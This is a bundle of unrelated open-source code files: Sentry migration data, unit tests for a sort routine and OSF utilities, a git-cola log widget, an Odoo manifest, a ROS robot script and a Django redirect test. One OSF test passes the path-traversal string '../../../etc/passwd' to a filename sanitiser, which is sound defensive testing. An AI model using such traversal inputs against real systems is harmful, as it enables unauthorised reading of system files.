'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
symmetrical = True
| bsd-3-clause |
jakubtyniecki/pact | tests/test_merge_rec.py | 1 | 1117 |
""" merge rec sort tests module """
import unittest
import random
from sort import merge_rec
from tests import helper
class MergeSortTests(unittest.TestCase):
""" merge rec sort unit tests class """
max = 100
arr = []
def setUp(self):
""" setting up for the test """
self.arr = random.sample(range(self.max), self.max)
def test_null_input(self):
""" should raise when input array is None """
# arrange
inp = None
# act
with self.assertRaises(TypeError) as ex:
merge_rec.sort(inp)
# assert
self.assertEqual("'NoneType' object is not iterable", str(ex.exception))
def test_empty_input(self):
""" should return [] when input array is empty """
# arrange
inp = []
# act
res = merge_rec.sort(inp)
# assert
self.assertEqual(len(inp), len(res))
def test_sort_a_given_array(self):
""" should sort a given array """
# act
res = merge_rec.sort(self.arr[:])
# assert
self.assertTrue(helper.is_sorted(res))
| mit |
git-cola/git-cola | cola/widgets/log.py | 3 | 2617 | from __future__ import absolute_import, division, unicode_literals
import time
from qtpy import QtGui
from qtpy import QtWidgets
from qtpy.QtCore import Qt
from qtpy.QtCore import Signal
from .. import core
from .. import qtutils
from ..i18n import N_
from . import defs
from .text import VimTextEdit
class LogWidget(QtWidgets.QFrame):
"""A simple dialog to display command logs."""
channel = Signal(object)
def __init__(self, context, parent=None, output=None):
QtWidgets.QFrame.__init__(self, parent)
self.output_text = VimTextEdit(context, parent=self)
self.highlighter = LogSyntaxHighlighter(self.output_text.document())
if output:
self.set_output(output)
self.main_layout = qtutils.vbox(defs.no_margin, defs.spacing, self.output_text)
self.setLayout(self.main_layout)
self.channel.connect(self.append, type=Qt.QueuedConnection)
def clear(self):
self.output_text.clear()
def set_output(self, output):
self.output_text.set_value(output)
def log_status(self, status, out, err=None):
msg = []
if out:
msg.append(out)
if err:
msg.append(err)
if status:
msg.append(N_('exit code %s') % status)
self.log('\n'.join(msg))
def append(self, msg):
"""Append to the end of the log message"""
if not msg:
return
msg = core.decode(msg)
cursor = self.output_text.textCursor()
cursor.movePosition(cursor.End)
text = self.output_text
# NOTE: the ': ' colon-SP-SP suffix is for the syntax highlighter
prefix = core.decode(time.strftime('%Y-%m-%d %H:%M:%S: ')) # ISO-8601
for line in msg.split('\n'):
cursor.insertText(prefix + line + '\n')
cursor.movePosition(cursor.End)
text.setTextCursor(cursor)
def log(self, msg):
"""Add output to the log window"""
# Funnel through a Qt queued to allow thread-safe logging from
# asynchronous QRunnables, filesystem notification, etc.
self.channel.emit(msg)
class LogSyntaxHighlighter(QtGui.QSyntaxHighlighter):
"""Implements the log syntax highlighting"""
def __init__(self, doc):
QtGui.QSyntaxHighlighter.__init__(self, doc)
palette = QtGui.QPalette()
QPalette = QtGui.QPalette
self.disabled_color = palette.color(QPalette.Disabled, QPalette.Text)
def highlightBlock(self, text):
end = text.find(': ')
if end > 0:
self.setFormat(0, end + 1, self.disabled_color)
| gpl-2.0 |
hassoon3/odoo | addons/l10n_us/__openerp__.py | 341 | 1763 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'United States - Chart of accounts',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Localization/Account Charts',
'description': """
United States - Chart of accounts.
==================================
""",
'website': 'http://www.openerp.com',
'depends': ['account_chart', 'account_anglo_saxon'],
'data': [
'l10n_us_account_type.xml',
'account_chart_template.xml',
'account.account.template.csv',
'account_tax_code_template.xml',
'account_tax_template.xml',
'account_chart_template_after.xml',
'l10n_us_wizard.xml'
],
'demo': [],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ResByte/graph_slam | scripts/robot.py | 1 | 1487 | #!/usr/bin/env python
import roslib
import rospy
import sys
from geometry_msgs.msg import Twist
import numpy as np
from nav_msgs.msg import Odometry
from tf.transformations import euler_from_quaternion
import matplotlib.pyplot as plt
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
import itertools
class Robot():
"""This is a generic robot class to implement various machine learning algorithms and """
def __init__(self):
self.pose = [] #check if this needs to be initialized
rospy.init_node('robot',anonymous = False)
def odomCb(self,msg):
#print msg.pose.pose
quaternion = (msg.pose.pose.orientation.x,msg.pose.pose.orientation.y,msg.pose.pose.orientation.z,msg.pose.pose.orientation.w)
euler = euler_from_quaternion(quaternion)
#print euler
self.pose = [msg.pose.pose.position.x,msg.pose.pose.position.y,euler[2]]
print self.pose[0],self.pose[1],self.pose[2]
def odomSub(self):
rospy.Subscriber('/odom',Odometry,self.odomCb)
def cloudCb(self,data):
#data_out = pc2.read_points(data, field_names=None, skip_nans=False, uvs=[[data.width, data.height]])
#cloud = list(itertools.islice(data_out,0,100))
cloud = np.asarray(data)
print
def cloudSub(self):
rospy.Subscriber('/camera/depth/points',PointCloud2,self.cloudCb)
if __name__ == '__main__':
print "init_node"
try:
robot = Robot()
while not rospy.is_shutdown():
#robot.odomSub()
robot.cloudSub()
except:
rospy.loginfo("node terminated.") | gpl-2.0 |
erinspace/osf.io | tests/test_utils.py | 1 | 18008 | # -*- coding: utf-8 -*-
import datetime
import mock
import os
import pytest
import time
import unittest
from django.utils import timezone
from flask import Flask
from nose.tools import * # noqa (PEP8 asserts)
import blinker
from tests.base import OsfTestCase, DbTestCase
from osf_tests.factories import RegistrationFactory, UserFactory, fake_email
from framework.auth.utils import generate_csl_given_name
from framework.routing import Rule, json_renderer
from framework.utils import secure_filename, throttle_period_expired
from api.base.utils import waterbutler_api_url_for
from osf.utils.functional import rapply
from website.routes import process_rules, OsfWebRenderer
from website import settings
from website.util import paths
from website.util import web_url_for, api_url_for, is_json_request, conjunct, api_v2_url
from website.project import utils as project_utils
from website.profile import utils as profile_utils
try:
import magic # noqa
LIBMAGIC_AVAILABLE = True
except ImportError:
LIBMAGIC_AVAILABLE = False
HERE = os.path.dirname(os.path.abspath(__file__))
class TestTimeUtils(unittest.TestCase):
def test_throttle_period_expired_no_timestamp(self):
is_expired = throttle_period_expired(timestamp=None, throttle=30)
assert_true(is_expired)
def test_throttle_period_expired_using_datetime(self):
timestamp = timezone.now()
is_expired = throttle_period_expired(timestamp=(timestamp + datetime.timedelta(seconds=29)), throttle=30)
assert_false(is_expired)
is_expired = throttle_period_expired(timestamp=(timestamp - datetime.timedelta(seconds=31)), throttle=30)
assert_true(is_expired)
def test_throttle_period_expired_using_timestamp_in_seconds(self):
timestamp = int(time.time())
is_expired = throttle_period_expired(timestamp=(timestamp + 29), throttle=30)
assert_false(is_expired)
is_expired = throttle_period_expired(timestamp=(timestamp - 31), throttle=30)
assert_true(is_expired)
class TestUrlForHelpers(unittest.TestCase):
def setUp(self):
def dummy_view():
return {}
def dummy_guid_project_view():
return {}
def dummy_guid_profile_view():
return {}
self.app = Flask(__name__)
api_rule = Rule([
'/api/v1/<pid>/',
'/api/v1/<pid>/component/<nid>/'
], 'get', dummy_view, json_renderer)
web_rule = Rule([
'/<pid>/',
'/<pid>/component/<nid>/'
], 'get', dummy_view, OsfWebRenderer)
web_guid_project_rule = Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', dummy_guid_project_view, OsfWebRenderer)
web_guid_profile_rule = Rule([
'/profile/<pid>/',
], 'get', dummy_guid_profile_view, OsfWebRenderer)
process_rules(self.app, [api_rule, web_rule, web_guid_project_rule, web_guid_profile_rule])
def test_api_url_for(self):
with self.app.test_request_context():
assert api_url_for('dummy_view', pid='123') == '/api/v1/123/'
def test_api_v2_url_with_port(self):
full_url = api_v2_url('/nodes/abcd3/contributors/',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/nodes/abcd3/contributors/')
# Handles URL the same way whether or not user enters a leading slash
full_url = api_v2_url('nodes/abcd3/contributors/',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/nodes/abcd3/contributors/')
def test_api_v2_url_with_params(self):
"""Handles- and encodes- URLs with parameters (dict and kwarg) correctly"""
full_url = api_v2_url('/nodes/abcd3/contributors/',
params={'filter[fullname]': 'bob'},
base_route='https://api.osf.io/',
base_prefix='v2/',
page_size=10)
assert_equal(full_url, 'https://api.osf.io/v2/nodes/abcd3/contributors/?filter%5Bfullname%5D=bob&page_size=10')
def test_api_v2_url_base_path(self):
"""Given a blank string, should return the base path (domain + port + prefix) with no extra cruft at end"""
full_url = api_v2_url('',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/')
def test_web_url_for(self):
with self.app.test_request_context():
assert web_url_for('dummy_view', pid='123') == '/123/'
def test_web_url_for_guid(self):
with self.app.test_request_context():
# check /project/<pid>
assert_equal('/pid123/', web_url_for('dummy_guid_project_view', pid='pid123', _guid=True))
assert_equal('/project/pid123/', web_url_for('dummy_guid_project_view', pid='pid123', _guid=False))
assert_equal('/project/pid123/', web_url_for('dummy_guid_project_view', pid='pid123'))
# check /project/<pid>/node/<nid>
assert_equal('/nid321/', web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321', _guid=True))
assert_equal(
'/project/pid123/node/nid321/',
web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321', _guid=False))
assert_equal(
'/project/pid123/node/nid321/',
web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321'))
# check /profile/<pid>
assert_equal('/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123', _guid=True))
assert_equal('/profile/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123', _guid=False))
assert_equal('/profile/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123'))
def test_web_url_for_guid_regex_conditions(self):
with self.app.test_request_context():
# regex matches limit keys to a minimum of 5 alphanumeric characters.
# check /project/<pid>
assert_not_equal('/123/', web_url_for('dummy_guid_project_view', pid='123', _guid=True))
assert_equal('/123456/', web_url_for('dummy_guid_project_view', pid='123456', _guid=True))
# check /project/<pid>/node/<nid>
assert_not_equal('/321/', web_url_for('dummy_guid_project_view', pid='123', nid='321', _guid=True))
assert_equal('/654321/', web_url_for('dummy_guid_project_view', pid='123456', nid='654321', _guid=True))
# check /profile/<pid>
assert_not_equal('/123/', web_url_for('dummy_guid_profile_view', pid='123', _guid=True))
assert_equal('/123456/', web_url_for('dummy_guid_profile_view', pid='123456', _guid=True))
def test_web_url_for_guid_case_sensitive(self):
with self.app.test_request_context():
# check /project/<pid>
assert_equal('/ABCdef/', web_url_for('dummy_guid_project_view', pid='ABCdef', _guid=True))
# check /project/<pid>/node/<nid>
assert_equal('/GHIjkl/', web_url_for('dummy_guid_project_view', pid='ABCdef', nid='GHIjkl', _guid=True))
# check /profile/<pid>
assert_equal('/MNOpqr/', web_url_for('dummy_guid_profile_view', pid='MNOpqr', _guid=True))
def test_web_url_for_guid_invalid_unicode(self):
with self.app.test_request_context():
# unicode id's are not supported when encoding guid url's.
# check /project/<pid>
assert_not_equal('/ø∆≤µ©/', web_url_for('dummy_guid_project_view', pid='ø∆≤µ©', _guid=True))
assert_equal(
'/project/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/',
web_url_for('dummy_guid_project_view', pid='øˆ∆≤µˆ', _guid=True))
# check /project/<pid>/node/<nid>
assert_not_equal(
'/ø∆≤µ©/',
web_url_for('dummy_guid_project_view', pid='ø∆≤µ©', nid='©µ≤∆ø', _guid=True))
assert_equal(
'/project/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/node/%C2%A9%C2%B5%E2%89%A4%E2%88%86%C3%B8/',
web_url_for('dummy_guid_project_view', pid='øˆ∆≤µˆ', nid='©µ≤∆ø', _guid=True))
# check /profile/<pid>
assert_not_equal('/ø∆≤µ©/', web_url_for('dummy_guid_profile_view', pid='ø∆≤µ©', _guid=True))
assert_equal(
'/profile/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/',
web_url_for('dummy_guid_profile_view', pid='øˆ∆≤µˆ', _guid=True))
def test_api_url_for_with_multiple_urls(self):
with self.app.test_request_context():
url = api_url_for('dummy_view', pid='123', nid='abc')
assert url == '/api/v1/123/component/abc/'
def test_web_url_for_with_multiple_urls(self):
with self.app.test_request_context():
url = web_url_for('dummy_view', pid='123', nid='abc')
assert url == '/123/component/abc/'
def test_is_json_request(self):
with self.app.test_request_context(content_type='application/json'):
assert_true(is_json_request())
with self.app.test_request_context(content_type=None):
assert_false(is_json_request())
with self.app.test_request_context(content_type='application/json;charset=UTF-8'):
assert_true(is_json_request())
def test_waterbutler_api_url_for(self):
with self.app.test_request_context():
url = waterbutler_api_url_for('fakeid', 'provider', '/path')
assert_in('/fakeid/', url)
assert_in('/path', url)
assert_in('/providers/provider/', url)
assert_in(settings.WATERBUTLER_URL, url)
def test_waterbutler_api_url_for_internal(self):
settings.WATERBUTLER_INTERNAL_URL = 'http://1.2.3.4:7777'
with self.app.test_request_context():
url = waterbutler_api_url_for('fakeid', 'provider', '/path', _internal=True)
assert_not_in(settings.WATERBUTLER_URL, url)
assert_in(settings.WATERBUTLER_INTERNAL_URL, url)
assert_in('/fakeid/', url)
assert_in('/path', url)
assert_in('/providers/provider', url)
class TestFrameworkUtils(unittest.TestCase):
def test_leading_underscores(self):
assert_equal(
'__init__.py',
secure_filename('__init__.py')
)
def test_werkzeug_cases(self):
"""Test that Werkzeug's tests still pass for our wrapped version"""
# Copied from Werkzeug
# BSD licensed - original at github.com/mitsuhiko/werkzeug,
# /tests/test_utils.py, line 282, commit 811b438
assert_equal(
'My_cool_movie.mov',
secure_filename('My cool movie.mov')
)
assert_equal(
'etc_passwd',
secure_filename('../../../etc/passwd')
)
assert_equal(
'i_contain_cool_umlauts.txt',
secure_filename(u'i contain cool \xfcml\xe4uts.txt')
)
class TestWebpackFilter(unittest.TestCase):
def setUp(self):
self.asset_paths = {'assets': 'assets.07123e.js'}
def test_resolve_asset(self):
asset = paths.webpack_asset('assets.js', self.asset_paths, debug=False)
assert_equal(asset, '/static/public/js/assets.07123e.js')
def test_resolve_asset_not_found_and_not_in_debug_mode(self):
with assert_raises(KeyError):
paths.webpack_asset('bundle.js', self.asset_paths, debug=False)
class TestWebsiteUtils(unittest.TestCase):
def test_conjunct(self):
words = []
assert_equal(conjunct(words), '')
words = ['a']
assert_equal(conjunct(words), 'a')
words = ['a', 'b']
assert_equal(conjunct(words), 'a and b')
words = ['a', 'b', 'c']
assert_equal(conjunct(words), 'a, b, and c')
assert_equal(conjunct(words, conj='or'), 'a, b, or c')
def test_rapply(self):
inputs = {
'foo': 'bar',
'baz': {
'boom': ['kapow'],
'bang': 'bam'
},
'bat': ['man']
}
outputs = rapply(inputs, str.upper)
assert_equal(outputs['foo'], 'bar'.upper())
assert_equal(outputs['baz']['boom'], ['kapow'.upper()])
assert_equal(outputs['baz']['bang'], 'bam'.upper())
assert_equal(outputs['bat'], ['man'.upper()])
r_assert = lambda s: assert_equal(s.upper(), s)
rapply(outputs, r_assert)
def test_rapply_on_list(self):
inputs = range(5)
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_equal(outputs[i], i + 1)
def test_rapply_on_tuple(self):
inputs = tuple(i for i in range(5))
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_equal(outputs[i], i + 1)
assert_equal(type(outputs), tuple)
def test_rapply_on_set(self):
inputs = set(i for i in range(5))
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_in(i + 1, outputs)
assert_true(isinstance(outputs, set))
def test_rapply_on_str(self):
input = 'bob'
convert = lambda s: s.upper()
outputs = rapply(input, convert)
assert_equal('BOB', outputs)
assert_true(isinstance(outputs, basestring))
def test_rapply_preserves_args_and_kwargs(self):
def zero_if_not_check(item, check, checkFn=lambda n: n):
if check and checkFn(item):
return item
return 0
inputs = range(5)
outputs = rapply(inputs, zero_if_not_check, True, checkFn=lambda n: n % 2)
assert_equal(outputs, [0, 1, 0, 3, 0])
outputs = rapply(inputs, zero_if_not_check, False, checkFn=lambda n: n % 2)
assert_equal(outputs, [0, 0, 0, 0, 0])
class TestProjectUtils(OsfTestCase):
def set_registered_date(self, reg, date):
reg.registered_date = date
reg.save()
def test_get_recent_public_registrations(self):
count = 0
for i in range(5):
reg = RegistrationFactory()
reg.is_public = True
count = count + 1
tdiff = timezone.now() - datetime.timedelta(days=count)
self.set_registered_date(reg, tdiff)
regs = [r for r in project_utils.recent_public_registrations()]
assert_equal(len(regs), 5)
for i in range(4):
assert_true(regs[i].registered_date > regs[i + 1].registered_date)
for i in range(5):
reg = RegistrationFactory()
reg.is_public = True
count = count + 1
tdiff = timezone.now() - datetime.timedelta(days=count)
self.set_registered_date(reg, tdiff)
regs = [r for r in project_utils.recent_public_registrations(7)]
assert_equal(len(regs), 7)
class TestProfileUtils(DbTestCase):
def setUp(self):
self.user = UserFactory()
def test_get_other_user_profile_image_default_size(self):
profile_image = profile_utils.get_profile_image_url(self.user)
assert_true(profile_image)
def test_get_other_user_profile_image(self):
profile_image = profile_utils.get_profile_image_url(self.user, size=25)
assert_true(profile_image)
class TestSignalUtils(unittest.TestCase):
def setUp(self):
self.signals = blinker.Namespace()
self.signal_ = self.signals.signal('signal-')
self.mock_listener = mock.MagicMock()
def listener(self, signal):
self.mock_listener()
def test_signal(self):
self.signal_.connect(self.listener)
self.signal_.send()
assert_true(self.mock_listener.called)
class TestUserUtils(unittest.TestCase):
def test_generate_csl_given_name_with_given_middle_suffix(self):
given_name = 'Cause'
middle_names = 'Awesome'
suffix = 'Jr.'
csl_given_name = generate_csl_given_name(
given_name=given_name, middle_names=middle_names, suffix=suffix
)
assert_equal(csl_given_name, 'Cause A, Jr.')
def test_generate_csl_given_name_with_given_middle(self):
given_name = 'Cause'
middle_names = 'Awesome'
csl_given_name = generate_csl_given_name(
given_name=given_name, middle_names=middle_names
)
assert_equal(csl_given_name, 'Cause A')
def test_generate_csl_given_name_with_given_suffix(self):
given_name = 'Cause'
suffix = 'Jr.'
csl_given_name = generate_csl_given_name(
given_name=given_name, suffix=suffix
)
assert_equal(csl_given_name, 'Cause, Jr.')
def test_generate_csl_given_name_with_given(self):
given_name = 'Cause'
csl_given_name = generate_csl_given_name(given_name)
assert_equal(csl_given_name, 'Cause')
@pytest.mark.django_db
class TestUserFactoryConflict:
def test_build_create_user_time_conflict(self):
# Test that build and create user factories do not create conflicting usernames
# because they occured quickly
user_email_one = fake_email()
user_email_two = fake_email()
assert user_email_one != user_email_two
user_one_build = UserFactory.build()
user_two_build = UserFactory.build()
assert user_one_build.username != user_two_build.username
user_one_create = UserFactory()
user_two_create = UserFactory()
assert user_one_create.username != user_two_create.username
| apache-2.0 |
aerophile/django | tests/view_tests/tests/test_specials.py | 66 | 1428 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase, override_settings
@override_settings(ROOT_URLCONF='view_tests.generic_urls')
class URLHandling(TestCase):
"""
Tests for URL handling in views and responses.
"""
redirect_target = "/%E4%B8%AD%E6%96%87/target/"
def test_combining_redirect(self):
"""
Tests that redirecting to an IRI, requiring encoding before we use it
in an HTTP response, is handled correctly. In this case the arg to
HttpRedirect is ASCII but the current request path contains non-ASCII
characters so this test ensures the creation of the full path with a
base non-ASCII part is handled correctly.
"""
response = self.client.get('/中文/')
self.assertRedirects(response, self.redirect_target)
def test_nonascii_redirect(self):
"""
Tests that a non-ASCII argument to HttpRedirect is handled properly.
"""
response = self.client.get('/nonascii_redirect/')
self.assertRedirects(response, self.redirect_target)
def test_permanent_nonascii_redirect(self):
"""
Tests that a non-ASCII argument to HttpPermanentRedirect is handled
properly.
"""
response = self.client.get('/permanent_nonascii_redirect/')
self.assertRedirects(response, self.redirect_target, status_code=301)
| bsd-3-clause |
lochiiconnectivity/boto | boto/ec2/autoscale/__init__.py | 2 | 33259 | # Copyright (c) 2009-2011 Reza Lotun http://reza.lotun.name/
# Copyright (c) 2011 Jann Kleen
